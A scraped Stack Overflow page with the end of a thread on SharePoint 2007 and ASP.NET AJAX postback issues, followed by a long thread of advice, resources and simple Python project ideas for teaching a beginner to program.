AjaxBasePart: Easy ASP.NET 2.0 AJAX Extensions 1.0 and Office SharePoint Server 2007
The reason for this is that there exists a specific problem with mixing doPostback, UpdatePanel and SharePoint -- and the symptom is exactly what you're seeing: a full-page postback instead of an asynchronous postback. See this KB article for a workaround: A Web Part that contains an ASP.NET AJAX 1.0 UpdatePanel control that uses the _doPostBack() ...
Otherwise you can just install Service Pack 1 to fix your problem:
Windows SharePoint Services 3.0 Service Pack 1 (SP1)
A: There's a specific problem with mixing doPostback, UpdatePanel and SharePoint -- and the symptom is exactly what you're seeing: a full-page postback instead of an asynchronous postback. See this KB article for a workaround: http://support.microsoft.com/kb/941955
A: Todd Bleeker at Mindsharp showed me a piece of code he wrote that can use Ajax on SharePoint 2.0. It was pretty cool. I believe the company used it on their SharePoint site management software if you want to take a look (you used to be able to request a 30-day trial). I bet how to do it is on their Yahoo group (I can't remember the name, but I am sure that if you search for Mindsharp you'll find it).
As a note, Ajax has been around for a long time. Microsoft easily supported it since 2002 maybe earlier with the release of IE 5.5 (I don't know about other browsers, I was doing internal development and we only supported ie at the time). It just wasn't called that. The term Ajax is nothing more than a marketing term that someone coined later on.
A: Getting the latest service pack for SharePoint 2007 will resolve your problem (and add full support for AJAX). Without the service pack you will need to follow an example like that outlined in this article:
AjaxBasePart: Easy ASP.NET 2.0 AJAX Extensions 1.0 and Office SharePoint Server 2007
Posting this here so that people know there is an answer even without the latest service pack (secretGeek's response seems to say there is no chance).
A: From a technology standpoint, Service Pack 1 does not add full support for ASP.NET AJAX. You still need use the workarounds described in the various articles mentioned in the previous answers.
Particulary, you need to make sure that the web.config file for your SharePoint Web application has been updated to support the appropriate version of the ASP.NET AJAX Extentions.
The fact that the web.config had not been updated was the mostly likely cause of the problem described in the original question.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3075",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Best ways to teach a beginner to program? Original Question
I am currently engaged in teaching my brother to program. He is a total beginner, but very smart. (And he actually wants to learn). I've noticed that some of our sessions have gotten bogged down in minor details, and I don't feel I've been very organized. (But the answers to this post have helped a lot.)
What can I do better to teach him effectively? Is there a logical order that I can use to run through concept by concept? Are there complexities I should avoid till later?
The language we are working with is Python, but advice in any language is welcome.
How to Help
If you have good ones please add the following in your answer:
*
*Beginner Exercises and Project Ideas
*Resources for teaching beginners
*Screencasts / blog posts / free e-books
*Print books that are good for beginners
Please describe the resource with a link to it so I can take a look. I want everyone to know that I have definitely been using some of these ideas. Your submissions will be aggregated in this post.
Online Resources for teaching beginners:
*
*A Gentle Introduction to Programming Using Python
*How to Think Like a Computer Scientist
*Alice: a 3d program for beginners
*Scratch (A system to develop programming skills)
*How To Design Programs
*Structure and Interpretation of Computer Programs
*Learn To Program
*Robert Read's How To Be a Programmer
*Microsoft XNA
*Spawning the Next Generation of Hackers
*COMP1917 Higher Computing lectures by Richard Buckland (requires iTunes)
*Dive into Python
*Python Wikibook
*Project Euler - sample problems (mostly mathematical)
*pygame - an easy python library for creating games
*Invent Your Own Computer Games With Python
*Foundations of Programming for a next step beyond basics.
*Squeak by Example
*Snake Wrangling For Kids (It's not just for kids!)
Recommended Print Books for teaching beginners
*
*Accelerated C++
*Python Programming for the Absolute Beginner
*Code by Charles Petzold
*Python Programming: An Introduction to Computer Science 2nd Edition
A: I don't know if anyone has mentioned this here, yet, but You might want to check out Zed Shaw's Learn Python the Hard Way
Hope this Helps
A: http://tryruby.hobix.com/">Try Ruby (In Your Browser)
A: How to Design Programs
Structure and Interpretation of Computer Programs. Video lectures at http://www.swiss.ai.mit.edu/classes/6.001/abelson-sussman-lectures/
A: This is a fantastic book which my little brothers used to learn:
http://pine.fm/LearnToProgram/
Of course, the most important thing is to start on a real, useful program of some kind IMMEDIATELY after finishing the book.
A: If he's interested, aren't the minor details the good parts? Using python, you've already cut the GUI off of it so that confusion is gone. Why not pick a project, a game or something, and implement it. The classic hi-lo number guessing game can be simply implemented from the command line in 20-30 lines of code (depending on language of course) and gives you variables, conditions, loops, and user input.
A: I'd just let him write tons of code. Let him drive in everything you guys do, and just be available to answer questions.
Believe it or not, after a few months of writings tons of crappy code, he'll start to get the idea and start writing better programs. At that point, you can get bogged down in details (memory, etc), and also talk about general design principles.
I've heard that what separates the great artists from the mediocre ones, is that every time they practice, they improve on something, no matter how small. Let your brother practice, and he'll improve every time he sits down at the keyboard.
Edit: [Justin Standard]
Esteban, this reminds me of a recent Coding Horror post, and I do think you are right. But I think it's still worthwhile to find methods to guide his practice. No question, I want him writing as much code as he knows how to. That's one reason I'm asking for sample projects.
A: You could try using Alice. It's a 3D program designed for use in introductory programming classes.
The two biggest obstacles for new programmers are often:
*
*syntax errors
*motivation (writing something meaningful and fun rather than contrived)
Alice uses a drag and drop interface for constructing programs, avoiding the possibility of syntax errors. Alice lets you construct 3D worlds and have your code control (simple) 3D characters and animation, which is usually a lot more interesting than implementing linked lists.
Experienced programmers may look down at Alice as a toy and scoff at dragging and dropping lines of code, but research shows that this approach works.
Disclaimer: I worked on Alice.
A: I recommend Logo (aka the turtle) to get the basic concepts down. It provides a good sandbox with immediate graphical feedback, and you can demostrate loops, variables, functions, conditionals, etc. This page provides an excellent tutorial.
After Logo, move to Python or Ruby. I recommend Python, as it's based on ABC, which was invented for the purpose of teaching programming.
When teaching programming, I must second EHaskins's suggestion of simple projects and then complex projects. The best way to learn is to start with a definite outcome and a measurable milestone. It keeps the lessons focused, allows the student to build skills and then build on those skills, and gives the student something to show off to friends. Don't underestimate the power of having something to show for one's work.
Theoretically, you can stick with Python, as Python can do almost anything. It's a good vehicle to teach object-oriented programming and (most) algorithms. You can run Python in interactive mode like a command line to get a feel for how it works, or run whole scripts at once. You can run your scripts interpreted on the fly, or compile them into binaries. There are thousands of modules to extend the functionality. You can make a graphical calculator like the one bundled with Windows, or you can make an IRC client, or anything else.
XKCD describes Python's power a little better:
You can move to C# or Java after that, though they don't offer much that Python doesn't already have. The benefit of these is that they use C-style syntax, which many (dare I say most?) languages use. You don't need to worry about memory management yet, but you can get used to having a bit more freedom and less handholding from the language interpreter. Python enforces whitespace and indenting, which is nice most of the time but not always. C# and Java let you manage your own whitespace while remaining strongly-typed.
From there, the standard is C or C++. The freedom in these languages is almost existential. You are now in charge of your own memory management. There is no garbage collection to help you. This is where you teach the really advanced algorithms (like mergesort and quicksort). This is where you learn why "segmentation fault" is a curse word. This is where you download the source code of the Linux kernel and gaze into the Abyss. Start by writing a circular buffer and a stack for string manipulation. Then work your way up.
A: First of all, start out like everyone else does: with a Hello World program. It's simple, and it gives them a basic feel for the layout of a program. Try and remember back to when you were first programming, and how difficult some of the concepts were - start simple.
After Hello World, move on to creating some basic variables, arithmetic, then onto boolean logic and if/else statements. If you've got one of your old programming textbooks, check out some of the early examples and have him run through those. Just don't try to introduce too much all at once, or it will be overwhelming and confusing.
A: Something you should be very mindful of while teaching your brother to program is for him not to rely too heavily on you. Often when I find myself helping others they will begin to think of me as answer book to all of their questions and instead of experimenting to find an answer they simply ask me. Often the best teacher is experimentation and every time your brother has a question like "What will happen if I add 2 to a string?" you should tell him to try it out and see for himself. Also I have noticed that when I cannot get a concept through to someone, it helps to see some sample code where we can look at each segment individually and explain it piece by piece. As a side note people new to programming often have trouble with the idea of object oriented programming, they will say they understand it when you teach it to them but will not get a clear concept of it until actually implementing it.
A: I used to teach programming, and your brother has one main advantage over most of my students: he wants to learn :)
If you decide to go with C, a friend has a site that has the sort of programs those of us from older generations remember as BASIC type-ins. The more complex of them use ncurses, which sort of negates their use as a teaching aid somewhat, but some of them are tiny little things and you can learn loads without being taught to.
Personally I think Python and Ruby would make great first languages.
EDIT:
This list of beginner programming assignments that appeared overnight might be just what you are looking for.
A: It really depends on your brother's learning style. Many people learn faster by getting their hands dirty & just getting into it, crystallising the concepts and the big picture as they progress and build their knowledge.
Me, I prefer to start with the big picture and drill down into the nitty-gritty. The first thing I wanted to know was how it all fits together then all that Object-oriented gobbledygook, then about classes & instances and so-on. I like to know the underlying concepts and a bit of theory before I learn the syntax. I had a bit of an advantage because I wrote some games in BASIC 20 years ago but nothing much since.
Perhaps it is useful to shadow a production process by starting with an overall mission statement, then a plan and/or flowchart, then elaborate into some pseudo code (leaning towards the syntax you will ultimately use) before actually writing the code.
The golden rule here is to suss out your student's learning style.
A: If your brother has access to iTunes, he can download video lectures of an introductory computer science course given by Richard Buckland at the University of New South Wales. He's an engaging instructor and covers fundamentals of computing and the C language. If nothing else, tell your brother to play the vids in the background and some concepts might sink in through osmosis. :)
COMP1917 Higher Computing - 2008 Session 1
http://deimos3.apple.com/WebObjects/Core.woa/Browse/unsw.edu.au.1504975442.01504975444
If the link doesn't work, here's a path:
Home -> iTunes U --> Engineering --> COMP1917 Higher Computing - 2008 Session 1
A: There's a wikibook that is pretty good for learning Python.
I don't know how the wikibooks are for other languages, but I personally learned python from the wikibook as it was in Feb 2007
PS: if you're unfamiliar with wikibooks, it's basically the Wikipedia version of book authoring. It's sort of hard to describe, but if you check out a few of the books on there you'll see how it works.
A: Python Programming for the absolute beginner
Python Programming for the absolute beginner cover http://safari.oreilly.com/images/1592000738/1592000738_xs.jpg
A: I think Python is a great idea. I would give him a few basic assignments to do on his own and tell him that any dead ends he hits can probably be resolved by a trip to google. For me, at least, solving a problem on my own always made it stick better than someone telling me the solution.
Some possible projects (in no particular order):
*
*Coin flip simulator. Let the user input a desired number of trials for the coin flipping. Execute it and display the results along with the percentage for heads or tails.
*Make a temperature converter with a menu that takes user input to choose which kind of conversion the user wants to do. After choosing the conversion and doing it, it should return to the main menu.
Here's an example of an extended converter with the same idea: http://pastebin.org/6541
*Make a program that takes a numeric input and displays the letter grade it would translate to. It'll end up evaluating the input against if and elif statements to find where it fits.
*Make a simple quiz that goes through several multiple choice or fill in the blank questions. At the end it will display how the user did. He can pick any questions he wants.
*Take an input of some (presumably large) number of pennies and convert it into bigger denominations. For example, 149 pennies = 1 dollar, 1 quarter, 2 dimes, and 4 pennies.
*Create a simple list manager. Be able to add/delete lists and add/delete entries in those lists. Here's an example of a christmas list manager: http://pastebin.org/6543
*Create a program that will build and then test whether entered numbers form a magic square (with a 2D array). Here's some sample code, but it should really print out the square at each step in order to show where the user is in terms of building the square: http://pastebin.org/6544
I would also suggest doing some stuff with xTurtle or another graphics module to mix things up and keep him from getting bored. Of course, this is very much practice programming and not the scripting that a lot of people would really be using Python for, but the examples I gave are pretty much directly taken from when I was learning via Python and it worked out great for me. Good luck!
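For reference, here is a minimal sketch of the coin flip simulator from the first bullet (the prompt text and percentage formatting are just one possible choice):
import random

trials = int(input("Number of coin flips: "))   # use raw_input on Python 2
heads = sum(random.randint(0, 1) for _ in range(trials))  # count 1 as heads
tails = trials - heads
print("Heads: %d (%.1f%%)" % (heads, 100.0 * heads / trials))
print("Tails: %d (%.1f%%)" % (tails, 100.0 * tails / trials))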
A: Just make it fun!
Amazingly, Scala might be the easiest if you try Kojo.
A: If your brother likes puzzles, I would recommend Python Challenge. I wouldn't use it as a formal teaching tool in a 1 on 1 tutorial, but it's something he can do when you're not together to challenge himself and have some fun.
A: Python Challenge
A: After going through a few free e-books, I found the best book for learning to program was Head First Programming, published by O'Reilly Press. It uses Python as the language and gives you programs to work on from the very start. They are all more interesting than 'Hello World'.
It's well worth the money I spent on it, and since it's been out for a bit you may be able to find a cheaper used copy on eBay or Amazon.
A: A good python course is MIT's A Gentle Introduction to Programming Using Python. It's all free online, and you don't have to be an MIT uberstudent to understand it.
Edit [Justin Standard]
This course uses this free online book: How To Think Like a Computer Scientist
I'm definitely finding it quite useful.
A: Python package VPython -- 3D Programming for Ordinary Mortals (video tutorial).
Code example:
from visual import *
floor = box (pos=(0,0,0), length=4, height=0.5, width=4, color=color.blue)
ball = sphere (pos=(0,4,0), radius=1, color=color.red)
ball.velocity = vector(0,-1,0)
dt = 0.01
while 1:
    rate (100)
    ball.pos = ball.pos + ball.velocity*dt
    if ball.y < ball.radius:
        ball.velocity.y = -ball.velocity.y
    else:
        ball.velocity.y = ball.velocity.y - 9.8*dt
VPython bouncing ball http://vpython.org/bounce.gif
A: Begin with Turtle graphics in Python.
I would use the turtle graphics which comes standard with Python. It is visual, simple and you could use this environment to introduce many programming concepts like iteration and procedure calls before getting too far into syntax. Consider the following interactive session in python:
>>> from turtle import *
>>> setup()
>>> title("turtle test")
>>> clear()
>>>
>>> #DRAW A SQUARE
>>> down() #pen down
>>> forward(50) #move forward 50 units
>>> right(90) #turn right 90 degrees
>>> forward(50)
>>> right(90)
>>> forward(50)
>>> right(90)
>>> forward(50)
>>>
>>> #INTRODUCE ITERATION TO SIMPLIFY SQUARE CODE
>>> clear()
>>> for i in range(4):
        forward(50)
        right(90)
>>>
>>> #INTRODUCE PROCEDURES
>>> def square(length):
        down()
        for i in range(4):
            forward(length)
            right(90)
>>>
>>> #HAVE STUDENTS PREDICT WHAT THIS WILL DRAW
>>> for i in range(50):
        up()
        left(90)
        forward(25)
        square(i)
>>>
>>> #NOW HAVE THE STUDENTS WRITE CODE TO DRAW
>>> #A SQUARE 'TUNNEL' (I.E. CONCENTRIC SQUARES
>>> #GETTING SMALLER AND SMALLER).
>>>
>>> #AFTER THAT, MAKE THE TUNNEL ROTATE BY HAVING
>>> #EACH SUCCESSIVE SQUARE TILTED
In trying to accomplish the last two assignments, they will have many failed attempts, but the failures will be visually interesting and they'll learn quickly as they try to figure out why it didn't draw what they expected.
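For instructors who want a cheat sheet, one possible solution sketch for the tunnel assignment (assuming the square(length) procedure defined above and the default east-facing heading) is:
>>> def tunnel(count, step):
        for i in range(count, 0, -1):
            side = i * step
            up()
            goto(-side / 2.0, side / 2.0)   # top-left corner, so all squares share a center
            square(side)
>>> tunnel(10, 20)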
A: I've had to work with several beginner (never wrote a line of code) programmers, and I'll be doing an after school workshop with high school students this fall. This is the closest thing I've got to documentation. It's still a work in progress, but I hope it helps.
1) FizzBuzz. Start with command line programs. You can write some fun games, or tools, very quickly, and you learn all of the language features very quickly without having to learn the GUI tools first. These early apps should be simple enough that you won't need to use any real debugging tools to make them work.
If nothing else, things like FizzBuzz are good projects. Your first few apps should not have to deal with DBs, the file system, configuration, etc. These are concepts which just confuse most people, and when you're just learning the syntax and basic framework features you really don't need more complexity.
Some projects:
*
*Hello World!
*Take the year of my birth, and calculate my age (just (now - then) no month corrections). (simple math, input, output)
*Ask for a direction (up, down, left, right), then tell the user their fate (fall in a hole, find a cake, etc.). (Boolean logic)
*FizzBuzz, but count once every second. (Loops, timers, and more logic; a sketch appears just after this list)
*Depending on their age, some really like an app which throws a random insult at the user at some interval. (Loops, arrays, timers, and randomness if you make the interval random)
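A minimal sketch of that timed FizzBuzz, for reference:
import time

for i in range(1, 101):
    if i % 15 == 0:
        print("FizzBuzz")
    elif i % 3 == 0:
        print("Fizz")
    elif i % 5 == 0:
        print("Buzz")
    else:
        print(i)
    time.sleep(1)  # count once every second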
2) Simple Project Once they have a good grasp of language features, you can start a project (simple, fun games work well). You should try to have the first project be able to be completed within 6-12 hours. Don't spend time to architect it early. Let them design it even if it sucks. If it falls apart, talk about what happened and why it failed, then pick another topic and start again.
This is where you start introducing the debugging capabilities of your tools. Even if you can see the problem by reading the code you should teach them how to use the tools, and then show them how you could see it. That serves the dual purpose of teaching the debugging tools and teaching how to ID errors without tools.
Once, or if, the project gets functional you can use it to introduce refactoring tools. It's good if you can then expand the project with some simple features which you never planned for. This usually means refactoring and significant debugging, since very few people write even half decent code their first time.
Some projects:
*
*Hangman game
*Experimenting with robotics(Vex and Mindstorms are options)
3) Real Project Start a real project which may take some time. Use proper source control, and make a point to have a schedule. Run this project like a real project; if nothing else it's good experience having to deal with the tools.
Obviously you need to adjust this for each person. The most important thing I've found is to make even the first simple apps apply to what the person is interested in.
Some projects:
*
*Tetris
*Text file based blog engine
*More advanced robotics work
A: The key thing is that the person in question needs to have some problem that they want solving. If you don't have a program that you want to write (and something sensible and well-defined, not "I want to write the next Quake!") then you can't learn to program, because you have nothing to motivate you. I mean, you could read a book and have a rough understanding of a language's syntax and semantics, but until you have a program that you want written you'll never grasp the nettle.
If that impetus exists then everything else is just minor details.
A: If you want to teach the basics of programming, without being language specific, there is an application called Scratch that was created at MIT. It's designed to help people develop programming skills. As users create Scratch projects, they learn to create conditions, loops, etc. There is also a community of Scratch projects, from which projects can be downloaded - that way you can explore other people's programs and see how they were built.
A: I think that once he has the basics (variables, loops, etc.) down, you should try to help him find something specific that he is interested in and help him learn the necessities to make it happen. I know that I am much more inclined and motivated to do something if it's of interest to me. Also, make sure to let him struggle through some of the tougher problems; nothing is more satisfying than the moment you figure it out on your own.
A: I was taught by learning how to solve problems in a language agnostic way using flowcharts and PDL (Program Design Language). After a couple weeks of that, I learned to convert the PDL I had written to a language. I am glad I learned that way because I have spent the majority of my years programming, solving problems without being tied to a language. What language I use has always been an implementation detail and not part of the design.
Having to solve the problem by breaking it down into its basic steps is a key skill. I think it is one of the things that separates those that can program from those that can't.
As far as how you tackle the order of concepts of a language, I believe the easiest way is to have a project in mind and tackle the concepts as they are needed. This lets you apply them as they are needed on something that you are interested in doing. When learning a language it is good to have several simple projects in mind and a few with progressive complexity. Deciding on those will help you map out the concepts that are needed and their order.
A: I would recommend also watching some screencasts - they are generally created in the context of a specific technology, not a language, though if there's Python code displayed, that'll do :). The point is - they're created by some good programmers, and watching how good programmers program is a good thing. You and your brother could do some pair programming as well; that might be an even better idea. Just don't forget to explain WHY you do something this way and not that way.
I think the best way to learn programming is from good examples and try not to even see the bad ones.
A: Robert Read wrote a useful guide, How to be a Programmer, which covers a wide area of programming issues that a beginner would find helpful.
A: There have already been a bunch of great answers, but for an absolute beginner, I would wholeheartedly recommend Hackety Hack. It was created by the unreasonably prolific why_the_lucky_stiff specifically to provide a BASIC/LOGO/Pascal-like environment for new programmers to experiment in. It's essentially a slick Ruby IDE with some great libraries (flash video, IM, web server) and interactive lessons. It makes a good pitch for programming, as it chose lessons that do fun, useful things. "Hello, world" may not impress right off the bat, but creating a custom IM client in 20 minutes can inspire someone to keep learning. Have fun!
A: Copy some simple code line by line and get them to read and interpret it as they go along. They will soon work it out. I started programming on an Acorn Electron with snippets of code from Acorn magazines. I had no idea about programming when I was 6, I used to copy the text, but gradually I learnt what the different words meant.
A: This may sound dumb, but why are YOU trying to teach your brother to program?
Often the best learning environment consists of a goal that can be achieved by a keen beginner (a sample program), an ample supply of resources (google/tutorials/books), and a knowledgeable source of advice that can provide guidance when needed.
You can definitely help with suggestions for the first two, but the last is your primary role.
A: I'd suggest taking an approach similar to that of the book Accelerated C++, in which they cover parts of C++ that are generally useful for making simple programs. For anyone new to programming, I think having something to show for a little amount of effort is a good way to keep them interested. Once you have covered the fundamentals of Python then you should sit back and let him experiment with the language.
In one of my university subjects for this semester they have taken an approach called Problem Based Learning (PBL), in which they use lectures to stimulate students about different approaches to problems. Since your brother is keen, you should take a similar approach. Set him small projects to work on and let him figure them out for himself. Then once he is finished you can go through his approach and compare and contrast with different methods.
If you can give him just the right amount of help to steer him in the right direction then he should be fine. Providing him with some good websites and books would also be a good idea.
I'd also recommend staying away from IDEs at the starting stages. Using the command line and a text editor will give him a greater understanding of the processes involved in compiling/assembling code.
I hope I've been of some help. :)
A: Plenty of things tripped me up in the beginning, but none more than simple mechanics. Concepts, I took to immediately. But miss a closing brace? Easy to do, and often hard to debug, in a non-trivial program.
So, my humble advice is: don't underestimate the basics (like good typing). It sounds remedial, and even silly, but it saved me so much grief early in my learning process when I stumbled upon the simple technique of typing the complete "skeleton" of a code structure and then just filling it in.
For an "if" statement in Python, start with:
if :
In C/C++/C#/Java:
if ()
{
}
In Pascal/Delphi:
If () Then
Begin
End
Then, type between the opening and closing tokens. Once this becomes a solid habit, so you do it without thinking, more of the brain is freed up to do the fun stuff. Not a very flashy bit of advice to post, I admit, but one that I have personally seen do a lot of good!
Edit: [Justin Standard]
Thanks for your contribution, Wing. Related to what you said, one of the things I've tried to help my brother remember the syntax for python scoping, is that every time there's a colon, he needs to indent the next line, and any time he thinks he should indent, there better be a colon ending the previous line.
A: How about this: Spawning the next generation of hackers by Nat Torkington.
A: There is a book called Code. I can't remember who wrote it, but it goes through the basics of a lot of stuff that we (programmers) know and take for granted that people we talk to know also. Everything from how to count in binary to how processors work. It doesn't have anything dealing with programming languages in it (well, from what I remember), but it is a pretty good primer. I will admit that I am also of the school that believes you have to know how the computer works to be able to effectively program things for it.
A: Python is easy for new developers to learn. You don't get tangled up in the specifics of memory management and type definition. Dive Into Python is a good beginner's guide to Python programming. When my sister wanted to learn programming I pointed her to the "Head First" line of books, which she found very easy to read and understand. I find it's hard to just start teaching someone because you don't have a lexicon to use with them. First have him read a few books or tutorials and ask you questions. From there you can assign projects and grade them. I find it hard to teach programming because I learned it over nearly 15 years of tinkering around.
A: Project Euler has a number of interesting mathematics problems that could provide great material for a beginning programmer to cut her teeth on. The problems begin easy and increase in difficulty and the web is full of sample solutions in various programming languages.
A: I'd recommend Charles Petzold's book Code - The Hidden Language of Computer Hardware and Software as an excellent general introduction to how computers work.
There's a lot of information in the book (382 pages) and it may take an absolute beginner some time to read but it's well worth it. Petzold manages to explain many of the core concepts of computers and programming from simple codes, relays, memory, CPUs to operating systems & GUIs in a very clear and enjoyable way. It will provide any reader with a good sense of what's actually happening behind the scenes when they write code.
I certainly wish it was around when I was first learning to program!
A: I don't know for sure what will be the best for your brother, but I know I started with Python. I've been playing various games from a very early age and wanted to make my own, so my uncle introduced me to Python with the pygame library. It has many tutorials and makes it all easy (WAY easier than OpenGL in my opinion).
It is limited to 2d, but you should be starting out simple anyway.
My uncle recommended python because he was interested in it at the time, but I recommend it, now fairly knowledgeable, because it's easy to learn, intuitive (or as intuitive as a programming language can get), and simple (but certainly not simplistic).
I personally found basic programming simply to learn programming obscenely boring at the time, but picked up considerable enthusiasm as I went. I really wanted to be learning in order to build something, not just to learn it.
A: Begin by asking him this question: "What kinds of things do you want to do with your computer?"
Then choose a set of activities that fit his answer, and choose a language that allows those things to be done. All the better if it's a simple (or simplifiable) scripting environment (e.g., AppleScript, Ruby, any shell (ksh, bash), or even .bat files).
The reasons are:
*
*If he's interested in the results, he'll probably be more motivated than if you're having him count Fibonacci's rabbits.
*If he's getting results he likes, he'll probably think up variations on the activities you create.
*If you're teaching him, he's not pursuing a serious career (yet); there's always time to switch to "industrial strength" languages later.
A: A good resource to teach young people is the free eBook "Invent your own games with Python":
http://pythonbook.coffeeghost.net/book1/IYOCGwP_book1.pdf
A: If he is interested then I wouldn't worry about focusing on games or whatnot. I'd just grab that beginner's 'teach yourself X' book you were about to throw away, give it to him, and let him struggle through it. Maybe talk about it after, and then do another and another. After that I'd pair program with him so he could learn how shallow and lame those books he read were. Then I'd start having him code something for himself. A website to track softball stats or whatever would engage him. For me it was a database for wine back in the day.
After that I would start in on the real books, domain design, etc.
A: I skimmed through the comments and it looks like nobody mentioned Foundations of Programming from www.CodeBetter.com. Although it requires a bit of foundation, it can certainly be a next step in the learning process.
A: Once he has the basics, I suggest the Tower of Hanoi as a good exercise.
I recommend beginning with the wooden toy if you have one; let him try to solve the problem by himself and describe his method in a systematic way. Show him where recursion comes into play. Explain to him how the number of moves depends on the number of disks.
Then let him write a program to print the sequence of moves, in your language of choice.
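For the teacher's back pocket, a minimal recursive sketch in Python (the peg names are arbitrary):
def hanoi(n, source, spare, target):
    if n == 0:
        return
    hanoi(n - 1, source, target, spare)   # move the top n-1 disks out of the way
    print("Move disk %d from %s to %s" % (n, source, target))
    hanoi(n - 1, spare, source, target)   # move them back on top of disk n

hanoi(3, "A", "B", "C")   # prints 2**3 - 1 = 7 moves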
A: Very good video introduction course by Stanford university (no prior knowledge required):
Programming Methodology
Will teach you good "methodologies" every programmer should know and some Java programming.
A: Book: Java Programming for Kids, Parents and Grandparents (PDF)
I don't have personal experience about learning using that book, but it appears to be nice because it quickly goes into producing something visible, and not spending too much time with the syntactic itty bitty details. Has someone here tried using that book?
A: once you've taught them how to program, they might want to learn how to develop software..
for that I think Greg Wilson's Software Carpentry course is great.. it also uses Python as the student's language.
A: I think Python is a really great language to start with. :-)
I suggest you try http://www.pythonchallenge.com/
It is built like a small adventure, and every solution links you to a new nice problem.
After solving a problem you get access to a nice forum to talk about your code and see what other people created.
A: I can recommend my project, PythonTurtle.
Summary:
PythonTurtle strives to provide the lowest-threshold way to learn Python. Students command an interactive Python shell (similar to the IDLE development environment) and use Python functions to move a turtle displayed on the screen. An illustrated help screen introduces the student to the basics of Python programming while demonstrating how to move the turtle.
It looks like this:
Screenshot: http://www.pythonturtle.com/screenshot.gif
A: Try to find a copy of Why's (Poignant) Guide to Ruby online. The original site is offline but I'm sure there are a few mirrors out there. It's not your typical programming guide; it puts a unique (and funny) spin on learning a new language that might suit your friend. Not to mention, Ruby is a great language to learn with.
A: Academic Earth offers links to free Computer Science courses from top universities. They have a section geared towards Beginning Computer Science. The languages taught in the beginning courses vary:
*
*MIT - Introduction to Computer Science and Programming - Python
*Stanford - Computer Science I: Programming Methodology - Java
*Harvard - Introduction to Computer Science I - C (main focus), with a few others sprinkled in for good measure (e.g., SQL, PHP, LISP, Assembler, etc.)
*Berkeley - a dialect of the LISP language
A: I would actually argue to pick a simpler language with fewer instructions. I personally learned on BASIC at home, as did Jeff. This way, you don't have to delve into more complicated issues like object oriented programming, or even procedures if you don't want to. Once he can handle simple control flow, then move on to something a little more complicated, but only simple features.
Maybe start with very simple programs that just add 2 numbers, and then grow to something that might require a branch, then maybe reading input and responding to it, then some kind of loop, and start combining them all together. Just start little and work your way up. Don't do any big projects until he can grasp the fundamentals (otherwise it may very well be too daunting and he could give up midway). Once he's mastered BASIC or whatever you choose, move on to something more complicated.
Just my $0.02
A: I think the "wisdom of crowds" work here. How did most people learn how to program? Many claim that they did so by copying programs of others, usually games they wanted to play in BASIC.
Maybe that route will work with him too?
A: I agree with Leac. I actually play with Scratch sometimes if I'm bored. It's a pretty fun visual way of looking at code.
How it works is, they give you a bunch of "blocks" (these look like legos) which you can stack. And by stacking these blocks, and interacting with the canvas (where you put your sprites, graphics), you can create games, movies, slideshows... it's really interesting.
When it's complete you can upload it right to the Scratch website, which is a YouTube-ish portal for Scratch applications. Not only that, but you can download any submission on the website and learn from or extend other Scratch applications.
A: I recommend starting them off with C/C++. I find that it is a good foundation for just about every other language. Also, the different versions of BASIC can be pretty dodgy, at best, and have no real correlation to actual programming.
A: I think learning to program because you want to learn to program will never be as good as learning to program because you want to DO something. If you can find something that your brother is interested in making work because he wants to make it work, you can just leave him with Google and he'll do it. And he'll have you around to check he's going along the right path.
I think one of the biggest problems with teaching programming in the abstract is that it's not got a real-world context that the learner can get emotionally invested in. Programming is hard, and there has to be some real payoff to make it worth the effort of doing it. In my case, I'd done computer science at uni, learned Pascal and COBOL there, and learned BASIC at home before that, but I never really got anywhere with it until I became a self-employed web designer back in the 90s and my clients needed functionality on their web sites, and were willing to pay about 10x more for functionality than for design. Putting food on the table is a hell of a motivator!
So I learned Perl, then ASP/VBScript, then JavaScript, then Flash/ActionScript then PHP - all in order to make the stuff I wanted to happen.
A: First off, I think there has already been some great answers, so I will try not to dupe too much.
*
*Get them to write lots of code, keep them asking questions to keep the brain juices flowing.
*I would say don't get bogged down with the really detailed information until they either run into the implications of it, or they ask.
I think one of the biggest points I would ensure is that they understand the core concepts of a framework. I know you are working in Python (which I have no clue about) but, for example, with ASP.NET getting people to understand the page/code-behind model can be a real challenge, but it's critical that they understand it. As an example, I recently had a question on a forum about "where do I put my data-access code, in the 'cs' file or the 'aspx' file".
So I would say, for the most part, let them guide the way, just be there to support them where needed, and prompt more questions to maintain interest. Just ensure they have the fundamentals down, and don't let them run before they can walk.
Good Luck!
A: I would recommend in first teaching the very basics that are used in almost every language, but doing so without a language. Outline all the basic concepts If-Else If-Else, Loops, Classes, Variable Types, Structures, etc. Everything that is the foundation of most languages. Then move onto really understanding Boolean, comparisons and complex AND OR statements, to get the feeling on what the outcomes are for more complex statements.
By doing it this way he will understand the concepts of programming and have a much easier time stepping into languages, from there its just learning the intricate details of the languages, its functions, and syntax.
A: My favourite "start learning to code" project is the Game Snakes or Tron because it allows you to start slow (variables to store the current "worm position", arrays to store the worm positions if the worm is longer than one "piece", loops to make the worm move, if/switch to allow the user to change the worm's direction, ...). It also allows to include more and more stuff into the project in the long run, e.g. object oriented programming (one worm is one object with the chance to have two worms at the same time) with inheritance (go from "Snakes" to "Tron" or the other way around, where the worm slightly changes behavior).
I'd suggest that you use Microsoft's XNA to start. In my experience starting to program is much more fun if you can see something on your screen, and XNA makes it really easy to get something moving on the screen. It's quite easy to do little changes and get another look, e.g. by changing colors, so he can see that his actions have an effect -> Impression of success. Success is fun, which is a great motivation to keep on learning.
A: This thread is very useful to me as a beginner (>100 lines of code) programmer.
Based on what I have been through, once I finished with the "Hello World" and move to variables and "if/else" statement, I got zapped with too much syntax; not knowing what to do with them.
So with an interesting simple project, I might get my interest up again. There are quite a lot of project suggestions here.
Can I ask a questions here?
Is it better to learn a scripting language like Autohotkey first?
Edit: [Justin Standard]
I think learning something macro-based like Autohotkey will only help minimally. Try learning a "real" programming language first. The easiest to get started with (according to most people) are python and ruby. I favor python, but both are pretty simple.
There is also a full stackoverflow post that answers the question of which language to start with.
A: At first I was interested in how different programs worked, so I started by looking at the source code. Then when I began to understand how the program worked, I would change certain parameters to see what would happen. So basically I learned how to read before I learned how to write. Which coincidently is how most people learn English.
So if I was trying to teach someone how to program, I would give them a small program to try to read and understand how it works, and have them just play around with the source code.
Only then would I give them "assignments" to try to accomplish.
Now if they had a particular reason for wanting to learn how to program, it would certainly be a good idea to start with something along the lines of what they want to accomplish. For example, if they wanted to be proficient in an application like Blender, it would definitely be a good idea to start with Alice.
